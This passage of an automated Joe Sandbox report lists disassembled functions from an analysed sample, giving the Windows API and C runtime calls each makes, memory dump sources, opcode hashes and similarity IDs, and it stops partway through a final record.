                                                      • Instruction Fuzzy Hash: 58118C718083469BD310DFA8EC8590EFBE8EFA8710F00851AF5949B2B1DB709584CF96
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00133E72,?,?,?,00000000), ref: 00134327
                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00133E72,?,?,?,00000000), ref: 00170717
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 6bef6978adaa3a9c208d460899d93d216d7e6ce286b907c4b71abb8d3803dfa4
                                                      • Instruction ID: a7cb8c3b91a1cb7bf4ed5bac95be84b2bf42b8c79319f02176b96432b64eb196
                                                      • Opcode Fuzzy Hash: 6bef6978adaa3a9c208d460899d93d216d7e6ce286b907c4b71abb8d3803dfa4
                                                      • Instruction Fuzzy Hash: C5014070244319BFF3251E28CC8AF667A9CFB15768F50C319FAE56A1E0C7B5AC858B14
                                                      APIs
                                                        • Part of subcall function 0014593C: __FF_MSGBANNER.LIBCMT ref: 00145953
                                                        • Part of subcall function 0014593C: __NMSG_WRITE.LIBCMT ref: 0014595A
                                                        • Part of subcall function 0014593C: RtlAllocateHeap.NTDLL(010D0000,00000000,00000001,?,00000004,?,?,00141003,?), ref: 0014597F
                                                      • std::exception::exception.LIBCMT ref: 0014101C
                                                      • __CxxThrowException@8.LIBCMT ref: 00141031
                                                        • Part of subcall function 001487CB: RaiseException.KERNEL32(?,?,?,001DCAF8,?,?,?,?,?,00141036,?,001DCAF8,?,00000001), ref: 00148820
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 3902256705-0
                                                      • Opcode ID: bcdba8aed9a2d5ece02b63fee4772d8912814fab82df5dd00e74bcccf536df49
                                                      • Instruction ID: 8045099b5190192dd9be48774c5d3d630a04aaf7d0af9626bf98adaf6f332022
                                                      • Opcode Fuzzy Hash: bcdba8aed9a2d5ece02b63fee4772d8912814fab82df5dd00e74bcccf536df49
                                                      • Instruction Fuzzy Hash: 34F0283550420DB3CB20FA98ED159DE7BAC9F11310F100426F924A72B1DFB08B91D2E0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: __lock_file_memset
                                                      • String ID:
                                                      • API String ID: 26237723-0
                                                      • Opcode ID: e32d6c4ecad2fc618474cc201a8db896b25acebf67eddfeb03a43732d2ad78ab
                                                      • Instruction ID: d2fed6b3dca1fd9deb0c8c6ba687eed5e8d611c732bfef6870352f0c942f8aa9
                                                      • Opcode Fuzzy Hash: e32d6c4ecad2fc618474cc201a8db896b25acebf67eddfeb03a43732d2ad78ab
                                                      • Instruction Fuzzy Hash: 44016C71C00749EBCF11AF66CC0199F7B62AF50760F144115F828571B2DB318A51DF91
                                                      APIs
                                                        • Part of subcall function 00148D58: __getptd_noexit.LIBCMT ref: 00148D58
                                                      • __lock_file.LIBCMT ref: 0014560B
                                                        • Part of subcall function 00146E3E: __lock.LIBCMT ref: 00146E61
                                                      • __fclose_nolock.LIBCMT ref: 00145616
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                      • String ID:
                                                      • API String ID: 2800547568-0
                                                      • Opcode ID: 4f952236db8a2a8b9b436b3b6b7e3465c4cb59dad5b5b7988ba4a70ccc5a1454
                                                      • Instruction ID: 2110ca561ecf81110b829f1148ae06da85fee692837d3ebe7cb4a2e70f8ba09a
                                                      • Opcode Fuzzy Hash: 4f952236db8a2a8b9b436b3b6b7e3465c4cb59dad5b5b7988ba4a70ccc5a1454
                                                      • Instruction Fuzzy Hash: AAF09072802B059BD720BB65880276E67E26F61335F168209A424AB1E2CB7C49419B51
                                                      APIs
                                                      • __lock_file.LIBCMT ref: 00145EB4
                                                      • __ftell_nolock.LIBCMT ref: 00145EBF
                                                        • Part of subcall function 00148D58: __getptd_noexit.LIBCMT ref: 00148D58
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                      • String ID:
                                                      • API String ID: 2999321469-0
                                                      • Opcode ID: 7ab8d740dc316ed078a8e090cca85817545d5529302611fa6b7cdb48c76f6d43
                                                      • Instruction ID: 4a66b0393e4bd580ceee27d8601b1b3c8bca650872ed356d108cfc7fe4e5e950
                                                      • Opcode Fuzzy Hash: 7ab8d740dc316ed078a8e090cca85817545d5529302611fa6b7cdb48c76f6d43
                                                      • Instruction Fuzzy Hash: 94F0E532911A169BDB10FB78880376EB2A16F21331F214706B420BB1F3CF788E429B91
                                                      APIs
                                                      • _memset.LIBCMT ref: 00135AEF
                                                      • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00135B1F
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell__memset
                                                      • String ID:
                                                      • API String ID: 928536360-0
                                                      • Opcode ID: 0bab02f57ebb4527a456bf68b924efc9a1bc8843c686f9a916c9e6e5b0bddf3b
                                                      • Instruction ID: 4b60b8c90edd8dda9a983b493df45b9e66c7f60538ba42d3edf8071e1bcc3e46
                                                      • Opcode Fuzzy Hash: 0bab02f57ebb4527a456bf68b924efc9a1bc8843c686f9a916c9e6e5b0bddf3b
                                                      • Instruction Fuzzy Hash: 85F0A7708083589FE7929B64DC8579AB7BC9700308F0002E9BB489A296D7710BC8CF51
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: LoadString$__swprintf
                                                      • String ID:
                                                      • API String ID: 207118244-0
                                                      • Opcode ID: e98f7143c1ec0fc1e456fa9136945b6f5be0d6a1c2adfe682324e0516b63a64b
                                                      • Instruction ID: eb3788bbd96c739b79d4492cd505a12584c36dc7fc9345e70c78afd17887ebae
                                                      • Opcode Fuzzy Hash: e98f7143c1ec0fc1e456fa9136945b6f5be0d6a1c2adfe682324e0516b63a64b
                                                      • Instruction Fuzzy Hash: 37B13A75A0010AAFCF14EF94D891DEEB7B5FF58710F10811AF915AB291EB70AA51CF90
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
                                                      • Instruction ID: 6502c1c085121dc3ac960dac59421800503878cfbe11e60bf76e1deea199bac2
                                                      • Opcode Fuzzy Hash: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
                                                      • Instruction Fuzzy Hash: 9961FE70600616DFDB14DF50E881A7AB7F5FF04304F96806DE9168B291E774EDA0CB92
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a5c4a7c15f76e4bedde7807a1fd563a80cfbbd844bef377cb21bdbe84098c4ec
                                                      • Instruction ID: f825506ec90a2231bebc8184798ddf4cf76105f5d632b3bd2da480d28313b75e
                                                      • Opcode Fuzzy Hash: a5c4a7c15f76e4bedde7807a1fd563a80cfbbd844bef377cb21bdbe84098c4ec
                                                      • Instruction Fuzzy Hash: 6451B135700614AFCF18EB68DD91E6E77B6AF55310F158068F81AAB392CB30EE15CB94
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                      • Instruction ID: 279a32c0085eb0d8f621e6e5f575394354c9e88a11eec21398605d4fc56d689e
                                                      • Opcode Fuzzy Hash: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                      • Instruction Fuzzy Hash: 37319275604602DFD729DF19D490A25F7A0FF08320F15C569E9AACB7A1D730ED81CB98
                                                      APIs
                                                      • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 001341B2
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: 5a674e13cad47ff5ab3a804d0a478114dd1ff0717eb4625b3a91f729370f51f6
                                                      • Instruction ID: 690cc7852bf9f8a6fd7bd3b9a3747daad945d8831e736fe8c6c0d46f9b4b76ec
                                                      • Opcode Fuzzy Hash: 5a674e13cad47ff5ab3a804d0a478114dd1ff0717eb4625b3a91f729370f51f6
                                                      • Instruction Fuzzy Hash: 49314C71A00A1AAFDB18CF6CC8806ADB7B5FF58310F158629E81993714D770BDA08B90
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: 4a42b7de2f0273ecf57fa260631bccf55f118fd889d5dab495b2dba732fdf130
                                                      • Instruction ID: ad795f4cbec2b1db16ad2dd4a35db390b15ade36486ea921c517d0688b20e420
                                                      • Opcode Fuzzy Hash: 4a42b7de2f0273ecf57fa260631bccf55f118fd889d5dab495b2dba732fdf130
                                                      • Instruction Fuzzy Hash: E2411A74508351DFDB14DF14D484B1ABBE1BF55308F1988ACE8999B3A2C371EC99CB52
                                                      APIs
                                                        • Part of subcall function 00134B29: FreeLibrary.KERNEL32(00000000,?), ref: 00134B63
                                                        • Part of subcall function 0014547B: __wfsopen.LIBCMT ref: 00145486
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,001327AF,?,00000001), ref: 001349F4
                                                        • Part of subcall function 00134ADE: FreeLibrary.KERNEL32(00000000), ref: 00134B18
                                                        • Part of subcall function 001348B0: _memmove.LIBCMT ref: 001348FA
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                      • String ID:
                                                      • API String ID: 1396898556-0
                                                      • Opcode ID: 49ae912aea4baee184ffebbaf866167bbfa5683b20e50be1f2bbe925c2fe36dc
                                                      • Instruction ID: 750cdf709ea894d5a56a1771b59befe2537e7a33fa9c23a20a714fb3224d4aa8
                                                      • Opcode Fuzzy Hash: 49ae912aea4baee184ffebbaf866167bbfa5683b20e50be1f2bbe925c2fe36dc
                                                      • Instruction Fuzzy Hash: CC110632650315ABCF15FB70CC16FAE77A99F54701F10842DF586A7191EF70AE10AB94
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: 711b6f85e7f5484569a0d4613de12ebd4afad36a536ab074b469a2b380bf78a2
                                                      • Instruction ID: c647365ccbf9a4e8d8dd2a524730b776903fa353b93531bc5f4055bbd34c06f3
                                                      • Opcode Fuzzy Hash: 711b6f85e7f5484569a0d4613de12ebd4afad36a536ab074b469a2b380bf78a2
                                                      • Instruction Fuzzy Hash: 9E21F474908351DFDB18DF14D444B1ABBE1BF88304F05896CF89A5B762D731E869CB92
                                                      APIs
                                                      • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00133CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00134276
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: f956f0eaa03dd3d4771d5b8f7ac6663f85d46849f563e4795639f51e90160ba3
                                                      • Instruction ID: 74a4008b9f9e1f9bdad7de1e67ec34e1e35612acab9ca761fcd05e8896656fad
                                                      • Opcode Fuzzy Hash: f956f0eaa03dd3d4771d5b8f7ac6663f85d46849f563e4795639f51e90160ba3
                                                      • Instruction Fuzzy Hash: 9C113A31200B019FD320CF55E480B63B7F5EF88750F10C92DE8AA96A50D7B0F845CB60
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                      • Instruction ID: 03c47d67e62f92386219e81dc9f2de3f04dba4f5a79bc41459bfa2b83724eb14
                                                      • Opcode Fuzzy Hash: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                      • Instruction Fuzzy Hash: 1301D6722017057ED3255B39D802B67BB98DB447A0F10852AF61ACB1E1EB31E44087A0
                                                      APIs
                                                      • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00194998
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentVariable
                                                      • String ID:
                                                      • API String ID: 1431749950-0
                                                      • Opcode ID: 06bc693147d016ae4db3d585c0c83c0a9b883d7df4a9d1155d57c2842995df24
                                                      • Instruction ID: b373cc764d3446a63877c723a0193be8889b946b657074e12dd0a9e92ba5e5c0
                                                      • Opcode Fuzzy Hash: 06bc693147d016ae4db3d585c0c83c0a9b883d7df4a9d1155d57c2842995df24
                                                      • Instruction Fuzzy Hash: 46F01D35608108AF8B15EBA5D846C9F7BA8EF59720B004155F9049B261DB70AD818B50
                                                      APIs
                                                        • Part of subcall function 00140FE6: std::exception::exception.LIBCMT ref: 0014101C
                                                        • Part of subcall function 00140FE6: __CxxThrowException@8.LIBCMT ref: 00141031
                                                      • _memset.LIBCMT ref: 00187CB4
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw_memsetstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 525207782-0
                                                      • Opcode ID: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                      • Instruction ID: 4ca0d44330033149cf45a6d238c1da344bc16f74af76840560638e677c77cfa6
                                                      • Opcode Fuzzy Hash: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                      • Instruction Fuzzy Hash: 9601F6742042059FD325EF6CD541F05BBE1AF6D710F24846AF5888B3A2DB72E800CF90
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _fseek
                                                      • String ID:
                                                      • API String ID: 2937370855-0
                                                      • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                      • Instruction ID: adcd9e1f96dad29ace381ab524d269fd958caaf0409ab44ef08d23892893866c
